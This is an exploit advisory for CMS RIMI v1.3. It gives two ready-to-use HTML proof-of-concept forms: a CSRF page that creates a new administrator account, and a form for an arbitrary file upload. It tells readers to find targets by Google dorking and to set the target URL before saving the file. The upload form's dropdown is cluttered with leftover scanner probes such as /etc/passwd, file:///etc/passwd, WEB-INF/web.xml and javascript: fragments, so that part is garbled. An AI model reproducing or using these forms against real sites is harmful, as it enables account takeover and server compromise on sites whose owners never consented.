============================================================================================================================================= | # Title : CMS RIMI v1.3 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://github.com/myroot593/RIMICMS | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following html code create a new admin . [+] Go to the line 9. [+] Set the target site link Save changes and apply . [+] save code as poc.html . <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Profile User Form</title> </head> <body> <form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST"> <!-- Text input for username --> <label for="username">Username:</label> <input type="text" id="username" name="username" required> <!-- Password input for password --> <label for="password">Password:</label> <input type="password" id="password" name="password" required> <!-- Password input for confirm password --> <label for="confirm_password">Confirm Password:</label> <input type="password" id="confirm_password" name="confirm_password" required> <!-- Text input for name --> <label for="nama">Nama:</label> <input type="text" id="nama" name="nama" required> <!-- Text input for email --> <label for="email">Email:</label> <input type="email" id="email" name="email" required> <!-- Hidden input for user ID --> <input type="hidden" name="id" value=""> <!-- Submit button --> <button type="submit">Submit</button> </form> </body> </html> ------------------ [+] Part 2 arbitrary file upload file uplaod [+] ------------- [+] Go to the line 3. [+] Set the target site link Save changes and apply . [+] Your file : 127.0.0.1/cmsrimi/content [+] save code as poc.html . <p class="sukses-form"></p> <p class="error-form"></p> <form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data"> <div class="form-group "> <label>Judul :</label> <input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value=""> <span><p class="error-form"></p></span> </div> <div class="form-group "> <label>Isi Berita :</label> <textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea> <span><p class="error-form"></p></span> </div> <div class="form-group"> <label>Kategori Berita :</label> <select class='form-control' name='kategori_berita' id='kategori_berita' required=''><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|*|*|>!(()&&!|*|*|</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=\'"()>\'"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1\'">1\'"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=\'">\'"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!--><!--</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select> <p class="error-form"></p> </div> <div class="form-group"> <label>Status:</label> <select class="form-control" name="status_berita" id="status_berita"> <option value="Diterbitkan">Diterbitkan</option> <option value="Draft">Draft</option> </select> </div> <div class="form-group"> <label>Gambar Berita</label> <input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22"> <input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita"> <p class="error-form"></p> </div> <button type="submit" class="btn btn-primary">Submit</button> </form> <p class="error-form"></p> <p class="error-form"></p> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================